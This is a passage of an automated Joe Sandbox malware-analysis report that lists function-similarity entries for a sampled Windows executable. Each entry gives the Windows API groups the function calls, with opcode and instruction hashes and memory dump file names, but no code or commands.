                                                                            • Instruction ID: e73b004436d2b4b7adc3a1a12c1d168cd62edd92ab9fd1b28a1daa7cb575a557
                                                                            • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                            • Instruction Fuzzy Hash: 17A18F72A186C087D7749F29A400AAEFF65FB85BD4F904125EA8917B68CB3CD452CF11
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Enabled
                                                                            • String ID:
                                                                            • API String ID: 3694350264-0
                                                                            • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                            • Instruction ID: 6266851fba6d8abcda9f441220ee0dcf5b36b53cd5247b3cf1d4213b187426e2
                                                                            • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                            • Instruction Fuzzy Hash: 7E91B221E0964646FB74BB359494BB9FB91AF44BD4F884032CA6D47695CF3CE4B3A320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                            • Instruction ID: cedf0af9b7d72ee70a6af9a86bbb8fbc5f6c97e13263f8f93a97a5307bc83c05
                                                                            • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                            • Instruction Fuzzy Hash: 5851B012A0D2D156FB75AB715504E7EAFA1FB46BC0F898874DA8907B46CE2CE472C330
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                            • String ID:
                                                                            • API String ID: 3401586794-0
                                                                            • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                            • Instruction ID: d98ff06af8db935a61fdc6cf4b21a786cf95847cd35eef238d547a2e78a2bc46
                                                                            • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                            • Instruction Fuzzy Hash: C851D42660864196F724EF31A844EAEABA0FB48BC8F944031DE4D13B44DF3DD466C760
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                            • String ID: DllGetClassObject
                                                                            • API String ID: 668425406-1075368562
                                                                            • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                            • Instruction ID: e1db8ad5d4c0504685c67fe59c2a7d27af5af31a7881d9c3aaaecea337aaf2e1
                                                                            • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                            • Instruction Fuzzy Hash: 5D518D62A08B4692EB28AF2AE540B79AB60FB84BC4F944134DB4D47A51DF7CF076C710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: LongMessageSendWindow
                                                                            • String ID:
                                                                            • API String ID: 3360111000-0
                                                                            • Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                            • Instruction ID: d05fd80bf7de581d64070d14b8d793b3182e88b2657945d5ab2a319e119a4d4a
                                                                            • Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                            • Instruction Fuzzy Hash: 86419225B49A4681EB70EB2AE890A78B760EBC4FD0F955531CE1E47BA4CF7DE4528310
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 4170576061-0
                                                                            • Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                            • Instruction ID: 6361dd6864c85b57f674e3228273323baef5a73d89cfc83db7f12ba157e93223
                                                                            • Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                            • Instruction Fuzzy Hash: E2418272A0878286EB30AF35A444AADBB60FB45BE4F844231DE5E43B95CF3CD556C711
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                            • String ID:
                                                                            • API String ID: 161812096-0
                                                                            • Opcode ID: f652d99759d139f7e87a15b3a4320fe0bc8d646037924ff5962e8acb98e6298b
                                                                            • Instruction ID: 9022fd1bdc6ce692c2a1a16fae48300a5dd88c7f6619d5fa1642ab2328a74822
                                                                            • Opcode Fuzzy Hash: f652d99759d139f7e87a15b3a4320fe0bc8d646037924ff5962e8acb98e6298b
                                                                            • Instruction Fuzzy Hash: 3E418C36A05B0595EB60EF36D880AAC7BA5FB84BD8FA54031DE5D03764CF38D866C710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                            • String ID:
                                                                            • API String ID: 395352322-0
                                                                            • Opcode ID: d1d8bf5937bffa04a585e1c3e8d3a5dfb2b3d01d6cd9d7eb2bde5fff57a10d68
                                                                            • Instruction ID: bd01974d86cb0e0a591a5ee1dd488b051fe4de0dd7f912fb7f9a4273ed8cc523
                                                                            • Opcode Fuzzy Hash: d1d8bf5937bffa04a585e1c3e8d3a5dfb2b3d01d6cd9d7eb2bde5fff57a10d68
                                                                            • Instruction Fuzzy Hash: 0A418336A18B8585E730EF61E494BEEA7A0FF89784F840131EA4D07A58DF3DD65AC710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: 9216a96fd79d501bc7d7b993b1647fe0d88fe075d6bc30e30818d81539167a03
                                                                            • Instruction ID: eea6adb50ff33da6ffc4aba4880e5e4871b2ef6c05bfbce144e06556d1cea43a
                                                                            • Opcode Fuzzy Hash: 9216a96fd79d501bc7d7b993b1647fe0d88fe075d6bc30e30818d81539167a03
                                                                            • Instruction Fuzzy Hash: 6831C121B08B4685DB74BF22E444969BBA0FF84FD0F888236DA4E43790DF3CE4968314
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandlePipe
                                                                            • String ID: nul
                                                                            • API String ID: 1424370930-2873401336
                                                                            • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                            • Instruction ID: 594dcf5faaf465cc69e16f34c781efa1e946615b8fff8df3b07ae7beae04d7ee
                                                                            • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                            • Instruction Fuzzy Hash: CA318E72A18B4682EB34AB34D414B79A7A0EF85BB8F900330DA7D06BD4DF3CD4568721
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandlePipe
                                                                            • String ID: nul
                                                                            • API String ID: 1424370930-2873401336
                                                                            • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                            • Instruction ID: ab5fe7da626b6f6487d1ae794c75c8c8bff53129aa0909e3ec1972e94df56ecc
                                                                            • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                            • Instruction Fuzzy Hash: E3218221A18B4682E734AB35D414BB9A7A0FF857BCF904331DA6E06BD4DF7CE4168710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                            • String ID:
                                                                            • API String ID: 3220332590-0
                                                                            • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                            • Instruction ID: 0a028ee75f1bfe10ece27e14d1cb81ddf94fa8b20fca64265ed7404776935625
                                                                            • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                            • Instruction Fuzzy Hash: ADA1046AA1824389E734AF35C404BBDB7A0FF04B9CF541535DE1A5BB94EA3D9852D330
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID: f$p
                                                                            • API String ID: 3215553584-1290815066
                                                                            • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                            • Instruction ID: 46f1ba6620c95f77b50c312cfabf1f090eb5b71efd99afddf6118132c393942d
                                                                            • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                            • Instruction Fuzzy Hash: CE12A521E1C253A5FB30BA34E086E7AFE91EB40794FD44271D699076C4DF3DE5628B22
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 564229958-0
                                                                            • Opcode ID: d9598a99559bbce9838ccc8e3f13cd44917abc84097f4dea62aff47b12167531
                                                                            • Instruction ID: 3ae6b12ee2d98ce87e76875f053cdbdb7343bdb6b016552463e21a6d2ea7033c
                                                                            • Opcode Fuzzy Hash: d9598a99559bbce9838ccc8e3f13cd44917abc84097f4dea62aff47b12167531
                                                                            • Instruction Fuzzy Hash: 2E518822A1868295EB34FF70D8406EDA765FF907C4FC00032EA4D5769ADFA8D756C760
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 0-2263619337
                                                                            • Opcode ID: 23a0e55fda232b1f8127efeb4f7af9ebb45442326d45a8adddcb1748763fba78
                                                                            • Instruction ID: 472d1be3495013b041e5f7a5a31fc46f20a24c7df7480c0bf83f06949e5b6ddd
                                                                            • Opcode Fuzzy Hash: 23a0e55fda232b1f8127efeb4f7af9ebb45442326d45a8adddcb1748763fba78
                                                                            • Instruction Fuzzy Hash: AE51A222B09A0685EB30FB79D0449BCA7A5FB44BD8FD48532DA0E47799CE39D527C360
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 2592858361-0
                                                                            • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                            • Instruction ID: 9a2d495a8885d21511549673edaf8c9a11a40c78892af025a294fc2b7dcbe5d9
                                                                            • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                            • Instruction Fuzzy Hash: 59518032A08A8286E730EB29E444B79BB60FB45FD4F914235CA6D47B95CF7DE4528710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2082702847-0
                                                                            • Opcode ID: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                            • Instruction ID: b5fbcbfdcb9fad72ddef38baed0466820bbe208a9bc40aab0fdba4c3182f913a
                                                                            • Opcode Fuzzy Hash: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                            • Instruction Fuzzy Hash: 7E21A425E09F4292EE34BB70A41497DEA90AF447F4F944734DA3D027D6DF3CD4268220
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                            • Instruction ID: a91b6e0efa2024475ed77bbf50d69998351cf9e0b6166fa91f00860cd5d92d70
                                                                            • Opcode Fuzzy Hash: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                            • Instruction Fuzzy Hash: 1F11A035B1470182EB28EB719948429AAA1FF89FC0F848138CE0E47B94DF3DD8528710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                            • Instruction ID: 191d520fa165015e4f4932ca7afc0ddaad6f50f5422b65ee016082fb0d760b17
                                                                            • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                            • Instruction Fuzzy Hash: 1D018F32B1474183EB20BB22EC18E2ABB61FF89BD5F845034CA0A06B14DF7CD1698B10
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
